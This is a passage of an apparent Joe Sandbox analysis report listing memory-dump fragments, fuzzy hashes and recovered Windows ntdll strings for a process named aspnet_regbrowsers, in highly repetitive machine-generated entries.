                                                                                                                                                                                        • Instruction Fuzzy Hash: 39B01272100540C7E319A714D90AB5B7250FF80F00F00893AE10781861DB38992CD456
                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                        • Source File: 00000016.00000002.512818584.00000000009E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 009D0000, based on PE: true
                                                                                                                                                                                        • Associated: 00000016.00000002.512818584.00000000009D0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                        • Associated: 00000016.00000002.512818584.0000000000AC0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                        • Associated: 00000016.00000002.512818584.0000000000AD0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                        • Associated: 00000016.00000002.512818584.0000000000AD4000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                        • Associated: 00000016.00000002.512818584.0000000000AD7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                        • Associated: 00000016.00000002.512818584.0000000000AE0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                        • Associated: 00000016.00000002.512818584.0000000000B40000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                        • Snapshot File: hcaresult_22_2_9d0000_aspnet_regbrowsers.jbxd
                                                                                                                                                                                        Similarity
                                                                                                                                                                                        • API ID:
                                                                                                                                                                                        • String ID:
                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                        • Opcode ID: 18add7eb1c2e7e0a1a3b96ba9e1590d2475205760e881687e9c53b2b1b4fe652
                                                                                                                                                                                        • Instruction ID: c40cb18f784fb740092d7f35057b9839572fe11e4001cfe90af8ac8386c88b07
                                                                                                                                                                                        • Opcode Fuzzy Hash: 18add7eb1c2e7e0a1a3b96ba9e1590d2475205760e881687e9c53b2b1b4fe652
                                                                                                                                                                                        • Instruction Fuzzy Hash: A6B09271508A40C7E204A704D985B46B221FB90B00F408938A04B865A0D72CA928C686
                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                        • Source File: 00000016.00000002.512818584.00000000009E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 009D0000, based on PE: true
                                                                                                                                                                                        • Associated: 00000016.00000002.512818584.00000000009D0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                        • Associated: 00000016.00000002.512818584.0000000000AC0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                        • Associated: 00000016.00000002.512818584.0000000000AD0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                        • Associated: 00000016.00000002.512818584.0000000000AD4000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                        • Associated: 00000016.00000002.512818584.0000000000AD7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                        • Associated: 00000016.00000002.512818584.0000000000AE0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                        • Associated: 00000016.00000002.512818584.0000000000B40000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                        • Snapshot File: hcaresult_22_2_9d0000_aspnet_regbrowsers.jbxd
                                                                                                                                                                                        Similarity
                                                                                                                                                                                        • API ID:
                                                                                                                                                                                        • String ID:
                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                        • Opcode ID: 41f935964cbdc9d6e59f893e4d9d45654507f6024dc22a4db73dc1be4add7f46
                                                                                                                                                                                        • Instruction ID: 152fdd420af7dfcc6df86c72954370e6eab1db85fd0a81c34441345ed48de2b3
                                                                                                                                                                                        • Opcode Fuzzy Hash: 41f935964cbdc9d6e59f893e4d9d45654507f6024dc22a4db73dc1be4add7f46
                                                                                                                                                                                        • Instruction Fuzzy Hash: 27B01272141540C7E349A714D90AB6B7220FB80F00F00893AE00781852DB389B2CD98A
                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                        • Source File: 00000016.00000002.512818584.00000000009E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 009D0000, based on PE: true
                                                                                                                                                                                        • Associated: 00000016.00000002.512818584.00000000009D0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                        • Associated: 00000016.00000002.512818584.0000000000AC0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                        • Associated: 00000016.00000002.512818584.0000000000AD0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                        • Associated: 00000016.00000002.512818584.0000000000AD4000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                        • Associated: 00000016.00000002.512818584.0000000000AD7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                        • Associated: 00000016.00000002.512818584.0000000000AE0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                        • Associated: 00000016.00000002.512818584.0000000000B40000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                        • Snapshot File: hcaresult_22_2_9d0000_aspnet_regbrowsers.jbxd
                                                                                                                                                                                        Similarity
                                                                                                                                                                                        • API ID:
                                                                                                                                                                                        • String ID:
                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                        • Opcode ID: 2e7bb4dc02deca6488bcbd727a6b6eb413310111d5b181e4d110d688bd4fe620
                                                                                                                                                                                        • Instruction ID: 4523e9276363b51c29093556ee00c3605be97a6a096d126b10744d78506899f7
                                                                                                                                                                                        • Opcode Fuzzy Hash: 2e7bb4dc02deca6488bcbd727a6b6eb413310111d5b181e4d110d688bd4fe620
                                                                                                                                                                                        • Instruction Fuzzy Hash: E7B012B2104580C7E31A9714D906B4B7210FB80F00F40893AA00B81861DB389A2CD456
                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                        • Source File: 00000016.00000002.512818584.00000000009E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 009D0000, based on PE: true
                                                                                                                                                                                        • Associated: 00000016.00000002.512818584.00000000009D0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                        • Associated: 00000016.00000002.512818584.0000000000AC0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                        • Associated: 00000016.00000002.512818584.0000000000AD0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                        • Associated: 00000016.00000002.512818584.0000000000AD4000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                        • Associated: 00000016.00000002.512818584.0000000000AD7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                        • Associated: 00000016.00000002.512818584.0000000000AE0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                        • Associated: 00000016.00000002.512818584.0000000000B40000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                        • Snapshot File: hcaresult_22_2_9d0000_aspnet_regbrowsers.jbxd
                                                                                                                                                                                        Similarity
                                                                                                                                                                                        • API ID:
                                                                                                                                                                                        • String ID:
                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                        • Opcode ID: 975dfa9cf9b8080f9d0320802deb543160739c3189efc7d7e2a617800603798d
                                                                                                                                                                                        • Instruction ID: 5af6445773ea8696aa9cd62fdf5509cf1cb9f7b4cf56a5a77559796e3d2133fe
                                                                                                                                                                                        • Opcode Fuzzy Hash: 975dfa9cf9b8080f9d0320802deb543160739c3189efc7d7e2a617800603798d
                                                                                                                                                                                        • Instruction Fuzzy Hash: 07B012B2240540C7E30D9714D906B4B7250FBC0F00F00893AE10B81850DA3C993CC44B
                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                        • Source File: 00000016.00000002.512818584.00000000009E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 009D0000, based on PE: true
                                                                                                                                                                                        • Associated: 00000016.00000002.512818584.00000000009D0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                        • Associated: 00000016.00000002.512818584.0000000000AC0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                        • Associated: 00000016.00000002.512818584.0000000000AD0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                        • Associated: 00000016.00000002.512818584.0000000000AD4000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                        • Associated: 00000016.00000002.512818584.0000000000AD7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                        • Associated: 00000016.00000002.512818584.0000000000AE0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                        • Associated: 00000016.00000002.512818584.0000000000B40000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                        • Snapshot File: hcaresult_22_2_9d0000_aspnet_regbrowsers.jbxd
                                                                                                                                                                                        Similarity
                                                                                                                                                                                        • API ID:
                                                                                                                                                                                        • String ID:
                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                        • Opcode ID: 6e5e409cf338bac94f49896e83b2b8a287e5016741aed655f6c9dd643cd52d5d
                                                                                                                                                                                        • Instruction ID: c0177d7ad0d10355b3c7d2619bc7f24452a3c2aab25a1a733e07692cdee9b307
                                                                                                                                                                                        • Opcode Fuzzy Hash: 6e5e409cf338bac94f49896e83b2b8a287e5016741aed655f6c9dd643cd52d5d
                                                                                                                                                                                        • Instruction Fuzzy Hash: B1B012B2200540C7E319D714D906F4B7210FB80F00F40893AB10B81862DB3C992CD45A
                                                                                                                                                                                        APIs
                                                                                                                                                                                        Strings
                                                                                                                                                                                        • Kernel-MUI-Language-Allowed, xrefs: 00A18827
                                                                                                                                                                                        • Kernel-MUI-Language-SKU, xrefs: 00A189FC
                                                                                                                                                                                        • Kernel-MUI-Language-Disallowed, xrefs: 00A18914
                                                                                                                                                                                        • WindowsExcludedProcs, xrefs: 00A187C1
                                                                                                                                                                                        • Kernel-MUI-Number-Allowed, xrefs: 00A187E6
                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                        • Source File: 00000016.00000002.512818584.00000000009E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 009D0000, based on PE: true
                                                                                                                                                                                        • Associated: 00000016.00000002.512818584.00000000009D0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                        • Associated: 00000016.00000002.512818584.0000000000AC0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                        • Associated: 00000016.00000002.512818584.0000000000AD0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                        • Associated: 00000016.00000002.512818584.0000000000AD4000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                        • Associated: 00000016.00000002.512818584.0000000000AD7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                        • Associated: 00000016.00000002.512818584.0000000000AE0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                        • Associated: 00000016.00000002.512818584.0000000000B40000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                        • Snapshot File: hcaresult_22_2_9d0000_aspnet_regbrowsers.jbxd
                                                                                                                                                                                        Similarity
                                                                                                                                                                                        • API ID: _wcspbrk
                                                                                                                                                                                        • String ID: Kernel-MUI-Language-Allowed$Kernel-MUI-Language-Disallowed$Kernel-MUI-Language-SKU$Kernel-MUI-Number-Allowed$WindowsExcludedProcs
                                                                                                                                                                                        • API String ID: 402402107-258546922
                                                                                                                                                                                        • Opcode ID: d11393a50ff94830136a98ac6452fd503eba3861cb226a0e308e69774a832fd7
                                                                                                                                                                                        • Instruction ID: 0c42919ba553b327ad98aad97a7fd42a2bd131c8df4471377506146135b9188b
                                                                                                                                                                                        • Opcode Fuzzy Hash: d11393a50ff94830136a98ac6452fd503eba3861cb226a0e308e69774a832fd7
                                                                                                                                                                                        • Instruction Fuzzy Hash: 6DF1D9B2D00209EFCF11DF95C981EEEBBB9FF48300F15456AE605A7221EB359A85DB50
                                                                                                                                                                                        APIs
                                                                                                                                                                                        Strings
                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                        • Source File: 00000016.00000002.512818584.00000000009E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 009D0000, based on PE: true
                                                                                                                                                                                        • Associated: 00000016.00000002.512818584.00000000009D0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                        • Associated: 00000016.00000002.512818584.0000000000AC0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                        • Associated: 00000016.00000002.512818584.0000000000AD0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                        • Associated: 00000016.00000002.512818584.0000000000AD4000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                        • Associated: 00000016.00000002.512818584.0000000000AD7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                        • Associated: 00000016.00000002.512818584.0000000000AE0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                        • Associated: 00000016.00000002.512818584.0000000000B40000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                        • Snapshot File: hcaresult_22_2_9d0000_aspnet_regbrowsers.jbxd
                                                                                                                                                                                        Similarity
                                                                                                                                                                                        • API ID: _wcsnlen
                                                                                                                                                                                        • String ID: Bias$DaylightBias$DaylightName$DaylightStart$DynamicDaylightTimeDisabled$StandardBias$StandardName$StandardStart$TimeZoneKeyName
                                                                                                                                                                                        • API String ID: 3628947076-1387797911
                                                                                                                                                                                        • Opcode ID: 1ad76c9c24f5522e91144bfd804a7af9d9bd0a6a06c0fbd3e0157497b379c268
                                                                                                                                                                                        • Instruction ID: 2d6a2ee1199225542ac6e8371031119374b5479fb545f52cbb64a3e1909358fe
                                                                                                                                                                                        • Opcode Fuzzy Hash: 1ad76c9c24f5522e91144bfd804a7af9d9bd0a6a06c0fbd3e0157497b379c268
                                                                                                                                                                                        • Instruction Fuzzy Hash: C241C879740349BEEB01AAA1CE86FDF776CEF05B44F500512BA04DA192DFB4DB109BA4
                                                                                                                                                                                        APIs
                                                                                                                                                                                        Strings
                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                        • Source File: 00000016.00000002.512818584.00000000009E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 009D0000, based on PE: true
                                                                                                                                                                                        • Associated: 00000016.00000002.512818584.00000000009D0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                        • Associated: 00000016.00000002.512818584.0000000000AC0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                        • Associated: 00000016.00000002.512818584.0000000000AD0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                        • Associated: 00000016.00000002.512818584.0000000000AD4000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                        • Associated: 00000016.00000002.512818584.0000000000AD7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                        • Associated: 00000016.00000002.512818584.0000000000AE0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                        • Associated: 00000016.00000002.512818584.0000000000B40000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                        • Snapshot File: hcaresult_22_2_9d0000_aspnet_regbrowsers.jbxd
                                                                                                                                                                                        Similarity
                                                                                                                                                                                        • API ID: ___swprintf_l
                                                                                                                                                                                        • String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
                                                                                                                                                                                        • API String ID: 48624451-2108815105
                                                                                                                                                                                        • Opcode ID: 7953ce99627684e69ec3d87409ec5b2fcf0625f9221f4cd43051ea53a058a6db
                                                                                                                                                                                        • Instruction ID: a12b724dacbe860046bccd022bd1295ef35e0841e0cbb4b9e5bac2eb45c8933a
                                                                                                                                                                                        • Opcode Fuzzy Hash: 7953ce99627684e69ec3d87409ec5b2fcf0625f9221f4cd43051ea53a058a6db
                                                                                                                                                                                        • Instruction Fuzzy Hash: AE6105B1904655AACB38DF59C8808BEBBB5EF94301B14C12EF9DA47581D734AB44DBA0
                                                                                                                                                                                        APIs
                                                                                                                                                                                        Strings
                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                        • Source File: 00000016.00000002.512818584.00000000009E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 009D0000, based on PE: true
                                                                                                                                                                                        • Associated: 00000016.00000002.512818584.00000000009D0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                        • Associated: 00000016.00000002.512818584.0000000000AC0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                        • Associated: 00000016.00000002.512818584.0000000000AD0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                        • Associated: 00000016.00000002.512818584.0000000000AD4000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                        • Associated: 00000016.00000002.512818584.0000000000AD7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                        • Associated: 00000016.00000002.512818584.0000000000AE0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                        • Associated: 00000016.00000002.512818584.0000000000B40000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                        • Snapshot File: hcaresult_22_2_9d0000_aspnet_regbrowsers.jbxd
                                                                                                                                                                                        Similarity
                                                                                                                                                                                        • API ID: ___swprintf_l
                                                                                                                                                                                        • String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
                                                                                                                                                                                        • API String ID: 48624451-2108815105
                                                                                                                                                                                        • Opcode ID: bdcaa79cde0af0b176db4751aee6e002c87771c358aa833da090f177998a80eb
                                                                                                                                                                                        • Instruction ID: 54e113844c1491422afb9cdbd08b36cc51eeedad0a7eab69cbea45544ac906c3
                                                                                                                                                                                        • Opcode Fuzzy Hash: bdcaa79cde0af0b176db4751aee6e002c87771c358aa833da090f177998a80eb
                                                                                                                                                                                        • Instruction Fuzzy Hash: 0461B077A00A48BBCF24DF99C9404BE7BF5EF54314B14C52AF8AAA7141E234EF849B50
                                                                                                                                                                                        APIs
                                                                                                                                                                                        • BaseQueryModuleData.KERNEL32(?,00000000,00000000,ExecuteOptions,?,?,?), ref: 00A43F12
                                                                                                                                                                                        Strings
                                                                                                                                                                                        • CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions, xrefs: 00A43EC4
                                                                                                                                                                                        • CLIENT(ntdll): Processing %ws for patching section protection for %wZ, xrefs: 00A4E2FB
                                                                                                                                                                                        • ExecuteOptions, xrefs: 00A43F04
                                                                                                                                                                                        • CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database, xrefs: 00A43F4A
                                                                                                                                                                                        • CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ, xrefs: 00A43F75
                                                                                                                                                                                        • Execute=1, xrefs: 00A43F5E
                                                                                                                                                                                        • CLIENT(ntdll): Processing section info %ws..., xrefs: 00A4E345
                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                        • Source File: 00000016.00000002.512818584.00000000009E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 009D0000, based on PE: true
                                                                                                                                                                                        • Associated: 00000016.00000002.512818584.00000000009D0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                        • Associated: 00000016.00000002.512818584.0000000000AC0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                        • Associated: 00000016.00000002.512818584.0000000000AD0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                        • Associated: 00000016.00000002.512818584.0000000000AD4000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                        • Associated: 00000016.00000002.512818584.0000000000AD7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                        • Associated: 00000016.00000002.512818584.0000000000AE0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                        • Associated: 00000016.00000002.512818584.0000000000B40000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                        • Snapshot File: hcaresult_22_2_9d0000_aspnet_regbrowsers.jbxd
                                                                                                                                                                                        Similarity
                                                                                                                                                                                        • API ID: BaseDataModuleQuery
                                                                                                                                                                                        • String ID: CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions$CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ$CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database$CLIENT(ntdll): Processing %ws for patching section protection for %wZ$CLIENT(ntdll): Processing section info %ws...$Execute=1$ExecuteOptions
                                                                                                                                                                                        • API String ID: 3901378454-484625025
                                                                                                                                                                                        • Opcode ID: 0afe0443130f03961ec5f4d0bd5f888670bab11ff43497aa921ceb3d6b15507e
                                                                                                                                                                                        • Instruction ID: 2e28052c5197b44b7640120b1fe05152d5f370553d91e7dac9e7d00205e2f168
                                                                                                                                                                                        • Opcode Fuzzy Hash: 0afe0443130f03961ec5f4d0bd5f888670bab11ff43497aa921ceb3d6b15507e
                                                                                                                                                                                        • Instruction Fuzzy Hash: 7A41B972A4421D7ADF20DB94DDC6FEE73BCAF54704F0004A9B605E6081EA70AB45CB61
                                                                                                                                                                                        APIs
                                                                                                                                                                                        Strings
                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                        • Source File: 00000016.00000002.512818584.00000000009E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 009D0000, based on PE: true
                                                                                                                                                                                        • Associated: 00000016.00000002.512818584.00000000009D0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                        • Associated: 00000016.00000002.512818584.0000000000AC0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                        • Associated: 00000016.00000002.512818584.0000000000AD0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                        • Associated: 00000016.00000002.512818584.0000000000AD4000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                        • Associated: 00000016.00000002.512818584.0000000000AD7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                        • Associated: 00000016.00000002.512818584.0000000000AE0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                        • Associated: 00000016.00000002.512818584.0000000000B40000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                        • Snapshot File: hcaresult_22_2_9d0000_aspnet_regbrowsers.jbxd
                                                                                                                                                                                        Similarity
                                                                                                                                                                                        • API ID: __fassign
                                                                                                                                                                                        • String ID: .$:$:
                                                                                                                                                                                        • API String ID: 3965848254-2308638275
                                                                                                                                                                                        • Opcode ID: b15de34944a390e3fa5e98378680e2de18144008d38fd4e6897fe19ea25b26ab
                                                                                                                                                                                        • Instruction ID: 652686975c86a94730d72b0f4087f5f7b4175f87a00321a25c9cafb94146db66
                                                                                                                                                                                        • Opcode Fuzzy Hash: b15de34944a390e3fa5e98378680e2de18144008d38fd4e6897fe19ea25b26ab
                                                                                                                                                                                        • Instruction Fuzzy Hash: BEA1AE71E0030AEFCF28CF64C865ABEB7B4BF15305F24956AF842A7282D7349A45CB51
                                                                                                                                                                                        APIs
                                                                                                                                                                                        • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00A52206
                                                                                                                                                                                        Strings
                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                        • Source File: 00000016.00000002.512818584.00000000009E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 009D0000, based on PE: true
                                                                                                                                                                                        • Associated: 00000016.00000002.512818584.00000000009D0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                        • Associated: 00000016.00000002.512818584.0000000000AC0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                        • Associated: 00000016.00000002.512818584.0000000000AD0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                        • Associated: 00000016.00000002.512818584.0000000000AD4000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                        • Associated: 00000016.00000002.512818584.0000000000AD7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                        • Associated: 00000016.00000002.512818584.0000000000AE0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                        • Associated: 00000016.00000002.512818584.0000000000B40000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                        • Snapshot File: hcaresult_22_2_9d0000_aspnet_regbrowsers.jbxd
                                                                                                                                                                                        Similarity
                                                                                                                                                                                        • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                                                                                                                                                                                        • String ID: RTL: Acquire Exclusive Sem Timeout %d (%I64u secs)$RTL: Acquire Shared Sem Timeout %d(%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                                                                                                                                                                                        • API String ID: 885266447-4236105082
                                                                                                                                                                                        • Opcode ID: ab9bda7b2dcd17ee9dbf3227cd92baf4298ff474acb00cea7eff2246a11064e0
                                                                                                                                                                                        • Instruction ID: a5296b7175f0839d7fafc3cfa1b94b3e0b97a7f3646ecc6054477b52f9f02135
                                                                                                                                                                                        • Opcode Fuzzy Hash: ab9bda7b2dcd17ee9dbf3227cd92baf4298ff474acb00cea7eff2246a11064e0
                                                                                                                                                                                        • Instruction Fuzzy Hash: 4C513835B002056BEB14CB18CC81FA773A9BFD5721F258229FD59DF286DA71EC858B90
                                                                                                                                                                                        APIs
                                                                                                                                                                                        • ___swprintf_l.LIBCMT ref: 00A5EA22
                                                                                                                                                                                          • Part of subcall function 00A313CB: ___swprintf_l.LIBCMT ref: 00A3146B
                                                                                                                                                                                          • Part of subcall function 00A313CB: ___swprintf_l.LIBCMT ref: 00A31490
                                                                                                                                                                                        • ___swprintf_l.LIBCMT ref: 00A3156D
                                                                                                                                                                                        Strings
                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                        • Source File: 00000016.00000002.512818584.00000000009E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 009D0000, based on PE: true
                                                                                                                                                                                        • Associated: 00000016.00000002.512818584.00000000009D0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                        • Associated: 00000016.00000002.512818584.0000000000AC0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                        • Associated: 00000016.00000002.512818584.0000000000AD0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                        • Associated: 00000016.00000002.512818584.0000000000AD4000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                        • Associated: 00000016.00000002.512818584.0000000000AD7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                        • Associated: 00000016.00000002.512818584.0000000000AE0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                        • Associated: 00000016.00000002.512818584.0000000000B40000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                        • Snapshot File: hcaresult_22_2_9d0000_aspnet_regbrowsers.jbxd
                                                                                                                                                                                        Similarity
                                                                                                                                                                                        • API ID: ___swprintf_l
                                                                                                                                                                                        • String ID: %%%u$]:%u
                                                                                                                                                                                        • API String ID: 48624451-3050659472
                                                                                                                                                                                        • Opcode ID: 5920c23f61b36f33d66d30b8f1a9c4d710602d715cbbbe3f1bcd9d62d46b9478
                                                                                                                                                                                        • Instruction ID: 0f8f81c210ede6adecdd55a70ae62269b02fe27d0affe95bdd2b67edea1e8081
                                                                                                                                                                                        • Opcode Fuzzy Hash: 5920c23f61b36f33d66d30b8f1a9c4d710602d715cbbbe3f1bcd9d62d46b9478
                                                                                                                                                                                        • Instruction Fuzzy Hash: A421C1729002299BCB20DF68DD41AFE73BCBB90705F544022FD46D3140DB71AA588BE1
                                                                                                                                                                                        APIs
                                                                                                                                                                                        Strings
                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                        • Source File: 00000016.00000002.512818584.00000000009E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 009D0000, based on PE: true
                                                                                                                                                                                        • Associated: 00000016.00000002.512818584.00000000009D0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                        • Associated: 00000016.00000002.512818584.0000000000AC0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                        • Associated: 00000016.00000002.512818584.0000000000AD0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                        • Associated: 00000016.00000002.512818584.0000000000AD4000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                        • Associated: 00000016.00000002.512818584.0000000000AD7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                        • Associated: 00000016.00000002.512818584.0000000000AE0000.00000040.00001000.00020000.00000000.sdmpDownload File
